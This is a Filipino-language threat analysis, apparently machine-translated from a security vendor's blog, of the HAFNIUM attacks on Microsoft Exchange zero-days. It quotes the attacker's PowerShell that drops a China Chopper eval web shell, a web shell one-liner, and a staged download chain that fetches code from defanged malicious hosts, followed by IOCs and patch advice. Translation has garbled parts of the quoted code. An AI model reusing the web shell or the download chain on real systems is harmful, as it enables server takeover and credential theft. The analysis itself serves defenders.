Noong Marso 2, inanunsyo ng Microsoft na isang threat group, ang HAFNIUM, ang aktibong nagsasamantala sa apat na zero-day vulnerabilities sa kanilang mga Exchange Server. Naglabas ang Microsoft ng mga out-of-band security update (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, at CVE-2021-27065), na nagbibigay-daan sa mga attacker na makapasok sa mga email account at magpatakbo ng malware sa server nang hindi man lang nalalaman ang anumang wastong kredensyal ng account.
Sinasamantala ng mga banta ng aktor ang kahinaan ng Zero-Day Server-Side Request Forgery (SSRF) sa Microsoft Exchange CVE-2021-26855. Nagbibigay-daan ito sa umaatake na i-bypass ang pagpapatotoo at makakuha ng remote code execution.
Ang CVE-2021-27065 ay isang post-auth arbitrary file writing vulnerability. Lumilikha ito ng file na may suffix ng .aspx at naglalagay ng code, at sinasamantala ng mga umaatake ang kahinaang ito. Inaasahan namin na ang mga umaatake ay nag-a-upload ng "china chopper web shell" sa mga nakompromisong server sa karamihan ng mga kaso.

Kadena ng pag-atake
Ang pagsasamantala sa mga exchange server na ito ay may kasamang mga indicator na nakompromiso sa IOC, web shell, o aspx na mga file. Kapag nangyari na ang pagsasamantala, ini-install ng mga attacker ang web shell sa Exchange server sa isang partikular na lokasyong "C:\inetpub\wwwroot\aspnet_client\discover.aspx" ng mga exchange server. Nakakita kami ng maraming aspx file sa pag-atakeng ito na may karaniwang pangalan tulad ng aspnet_client.aspx, load.aspx, discover.aspx, supp0rt.aspx, acceptable.aspx, error_page.aspx, shell.aspx, logaaa.aspx, dict.aspx, atbp., nakakita kami ng mga web shell sa Offline Address Book (OAB) na mga file.
Maaaring magpasok ang mga attacker ng code sa aspx page ng exchange Offline Address Book; ginagamit ang mga pahinang ito para sa karagdagang pagsasamantala. Natagpuan namin sa ibaba ang PowerShell na Nagpapatupad gamit ang mga kahina-hinalang parameter sa nakompromisong Exchange server. Ipinapakita ng pagpapatupad ng PowerShell code na ito na ang pagsulat/pagbabago ng file ay ginagawa sa pamamagitan ng pagsasamantala sa kahinaan.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -W hidden -ep bypass -enc try {$p=”C:\\inetpub\\wwwroot\\aspnet_client\\error.aspx”;
$FileStream=New-ObjectIO.FileStream@($p,[IO.FileMode]::Gumawa); $FileStream.Write([Text.Encoding]::UTF8.GetBytes('ExternalUrl:https://f/
“server”>functionPage_Load(){/*ExchangeService*/eval(Request[“unsafe”],”unsafe”);} '),0,147);if($FileStream){$FileStream.Flush();$FileStream.Dispose();$f=(ls$p);$t=”2015-09-13″;$f.CreationTime=$t;$f.LastAccessTime=$t;$f.LastAccessTime=$t;$f.LastAccessTime=$t;$f.LastAccessOras=$t;$f.LastAccessOras=$t;$f.LastAccessOras=$t;$f.LastWrites=$t;$f.LastWrite=$t.
“system”,”hidden”,”notcontentindexed”,”archive”}}catch{}.
Pagsusuri ng web shell
Ang Chinese chopper web shell ay isang maliit at one-liner na script, na sinusunod sa mga pag-atakeng ito. Ang nilalaman ng mga file na ito ay uri ng kakaiba at hindi kumpleto. Ang istraktura nito ay nakakakuha ng isang uri ng HTTP GET parameter argument na tumatawag sa eval o ilang salita tulad ng hindi ligtas, na nakompromiso ng iba't ibang uri.
Halimbawa-
“https://f/ function Page_Load(){eval(Request [“XOrSeMr3kgWUdFf6″],”unsafe”);} ”
Syntax ng ExternalUrl field sa OAB file tulad ng pagkuha ng variable mula sa HTTP request at pag-execute ng command line nito sa pamamagitan ng server. Ang “https://f/” ay hindi wastong syntax, at nakikita ang ilang random na parameter ng character; iyon ay Key na paggamit para sa pagpapatunay bago isagawa ang mga code. Sa kasong ito sa itaas, kritikal ang "XOrSeMr3kgWUdFf6". Sa OAB file, makikita natin ang petsa ng pagbabago ng file sa field na WhenChanged.
Screenshot para sa aspx file-

Fig 1. ASPX file
Ang pagkakaiba-iba sa script na nakita natin sa web shell file, ang ilan sa mga static na makikita natin tulad ng orange, ananas, at ilan sa mga encoding mula saBase64 string na ginamit sa file. Ang ilang komplikasyon ay ginagamit upang maiwasan ang pagtuklas na hatiin ang mga string at i-encode gamit ang mga base64 na string.

Fig 2. Listahan ng ExternalUrl

Fig 3. Listahan ng mga landas
Aktibidad pagkatapos ng Exploitation
Sa post-exploitation, nakakita kami ng maraming pagtatangka sa pag-atake na naglulunsad upang makakuha ng ganap na access sa server; kinapapalooban nito ang iba't ibang paggamit ng operator ng mga open-source na tool at pamamaraan para magtanim ng backdoor o maraming malware.
Variant 1:
Nakakita kami ng maraming PowerShell download sa mga server. Ang unang PowerShell script ay base64 encoded code na siyang nagda-download sa susunod na yugto mula sa http[:]//p.estonine[.]com/p?e. Pagkatapos, susubukan naming i-download ito sa susunod na yugto, nalaman naming na-download na ang PowerShell script.

Fig 4. Unang PowerShell script
Ang na-download na PowerShell script ay kailangang mag-invoke ng expression na may base64 encode, at Zlib compressed code para sa isang heavy obfuscation technique.

Fig 5. Susunod na yugto PS
Pagkatapos i-decode at i-decompress ang script na makikita sa ibaba ng code, gumagamit ang code ng iba't ibang pagsusuri at nangangalap ng impormasyon tulad ng MAC address, AV, bersyon ng OS, domain name, at user. Gagawa ang kamay ng mutex na "Global\PSEXEC," pagkatapos ay titingnan ang mga pribilehiyo ng Administrator para sa pagpapatakbo ng proseso. Ang ccc.log ay idinisenyo para sa pagkonekta sa CNC server.

Fig 6. PowerShell code stage 2
Susubukan ng script na makipag-ugnayan sa “http[:]//CDN.chatcdn[.]net”, ang domain na ito ay natagpuang malisyoso sa loob ng mahabang panahon; sa nakaraang DLTMiner na kumakalat, ginamit ito sa mga script ng PowerShell. Kung tumatakbo nang may mga pribilehiyo ng admin, i-download ang ”p?hig”, kung hindi ay “p?low”. Pagkatapos ay lilikha ito ng Winnet scheduled task run-time intervals. Kung walang tugon ang server, ida-download nito ang update.png? File Mula sa IP "188.166.162.201".

Fig 7. PowerShell code stage 2
Muli, ang na-download na file ay PowerShell Script at may napakaraming obfuscated na data; pagkatapos ng pag-decode ng code, makakakuha ito ng file sa paligid ng 2 MB size script at malawak na linya ng code. Sa paggamit ng code ng open-source code na ginamit sa pagsasamantala sa pamamagitan ng SMB, naobserbahan ang smb session setup request, smb session logoff, invoke-SMBExec, at ilang lateral movement technique.

Fig 8. PowerShell stage 3
Ang karagdagang pagsisiyasat sa code, pagkatapos ng pag-decode ng base64 code, ang karagdagang pagsisiyasat sa code ay nakakita ng dalawang executable na file, na katulad ng Mimikatz payload. Ito ay credential dumping open-source program na ginagamit upang makakuha ng impormasyon sa pag-login sa account at password. Ang mga kredensyal ay maaaring gamitin upang magsagawa ng lateral na paggalaw at ma-access ang mahalaga/pinaghihigpitang impormasyon.
Variant 2:
Ang isa pang PowerShell script na aming naobserbahan ay susubukan na mag-download ng pag-download ng file mula sa pahina ng GitHub. Ang extension para sa file ay .png, ngunit ito ay PE executable na file.

Fig 9. variant ng PowerShell Script 2
Kami ay nag-iimbestiga nang higit pa sa naturang PowerShell script, at ang chain ng impeksyon ay magbabahagi ng ilang kapana-panabik na bagay na kinuha ang paggamit ng mga kahinaan ng server ng Microsoft Exchange.
Mga IOC
| Webshell Hashes | PE Hashes |
| 0CD6F96A3460BE65C70C88A764F6EC56 | 3547D371C975779D6E0EDDF145936FB1 |
| 137E3A611C961EF33AAF49CCAA35E710 | 8AEA2AE91CC084731A08AA231E79A430 |
| 1A06924B507FA9A48E94D8AB819C7E42 | 9ff2613df0fc30afbc552f40360c37e7 |
| 1B18EC3D2B27CE39E83D602CB8BA84FE | cad2ee0a2e085a319505c4c4b68b3d2b |
| 1EAC1B6CE217C4BD31E93A3D913AF010 | E438712E336982548B884CBFBFEE6C9E |
| 217747243CB1FB9EAF6999284D7B9FCB | |
| 3068ECC45C32C24C8FD56FC0CB0A8829 | |
| 3446CEEE4BEA404ED72E14E154763428 | |
| 35B332744E614EF07A94FF4AC03B1F1A | |
| 35FCA708A86BEE43F068AD53C289963D | |
| 3CDBE5DF6383A6604737076F9E97E25A | |
| 49A62802887B6CA23FD067B942631698 | |
| 4D0C46CA88840A2649CD0C8596EA0AF9 | |
| 50499D3A3F4A072FD2FA3C5C5E651E25 | |
| 5970381424FB282AD7683431EB38C4B5 | |
| 5DD588C96A81586EE653BDB80D301A87 | |
| 65159FE1E1AE21F68CD235A8C045787A | |
| 6654AA50456B7D7C10061957DA128EF6 | |
| 6B2AEC787E30369911265CFA932192F4 | |
| 6D5F087C1D2E5A98E8EF00FE7883A531 | |
| 6F5909B3060D0F9AD4C4F4F6EFBAAC27 | |
| 87DCB5D6CCD2D614C34197915A9ADE15 | |
| 8B99A15118D4FB563CDEFA97BFEC6BFE | |
| 8CBF320BC0E0BE871E04152AFF775238 | |
| 8D5315AA11C3DBCDDFBA1A8D8D695F6B | |
| 93448E9EC4EEDA337879B148475B0E77 | |
| 94881B3621AF9A4DC64678258364A82B | |
| B82E014EE386C569710A9B03A7294A4C | |
| B86798F8F643CA76F20916C9347AE1C8 | |
| BA7235A228BEB5B8D1C630DA46B17E5F | |
| BEE691F207A19D782CCFBE5887B91015 | |
| C11680638FFF66F5DD494151D4A77389 | |
| CB9BE56C0DA7D625277823C796A10B12 | |
| D02AD7D92D348E011F4C63CBA6BA639D | |
| D08194CBB0D72C2609719C8E87D9036D | |
| D2EE996FBFB6ACA47CFD4319543626A3 | |
| D70FBE37FA09856158361411624591E7 | |
| D8A14C2BC15DC04B0BAE8A992990D41F | |
| DEADBB5A1E9669E268D2C1CC5D9965B0 | |
| E6F23A3282C7F0A693433815B4CFFC8F | |
| EDB48532A2AA88558474FFEA64355129 | |
| EF374AAB0EFFF9914A83362E0896F651 | |
| EFD4DC84D422420E887E6400FECCDDAD | |
| F7D74667839288B659EC1D87217FC749 | |
| FBB4182C9A441688FD71996DE7445A6F |
Mga Domain/IP
- http[:]//p.estonine[.]com/p?e
- http[:]//cdn.chatcdn[.]net
- http[:]//40.115.162.72/89[.]png
- https[:]//raw.githubusercontent[.]com/eluken890enlk/exmails/main
-
188.166.162.201
-
178.21.164.68
Pangalan ng Quickheal Detection
- HTTP/CVE-2021-26855.MES!PT
- HTTP/MSExchangeServer.SSRF!PT
- CVE-2021-26855.Webshell
Buod
Ang mga banta ng aktor na nagsasamantala sa mga zero-day na kahinaan na ito laban sa mga mahihinang server ng Microsoft Exchange, maraming mga post exploiting technique na ginagamit ng mga banta ng aktor upang makakuha ng access/makontrol ang Exchange server, kaya mahalagang mag-patch ng mga pinakabagong update sa seguridad.
Kami, bilang Quick heal, ay nagdagdag ng detection para sa vulnerability na ito sa IPS at file-based na detection para matukoy ang mga nakompromisong server at ang presensya ng iba pang IOC tulad ng mga web shell.
Pagpapagaan
- Lubos naming ipinapayo na agad na i-update ang lahat ng mga server ng Microsoft Exchange sa pinakabagong magagamit na mga patched na bersyon na inilabas ng Microsoft.
- Upang maprotektahan ang mga naturang pag-atake/pagsasamantala, inirerekomenda na magkaroon ng produkto ng seguridad sa kapaligiran at na-update sa oras.
- Ang pangangailangang maglapat ng mga patch ng seguridad sa oras mula sa mga vendor ay makakatulong upang maprotektahan at ma-secure ang mga system.
- Kung nakompromiso na ang server, kailangan nating linisin ang server bago mag-patch.
- Sa ibaba ng mga tool sa pagpapagaan na ibinahagi ng Microsoft ay maaaring gamitin ito laban sa kahinaan-
- https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/
- https://github.com/microsoft/CSS-Exchange/tree/main/Security



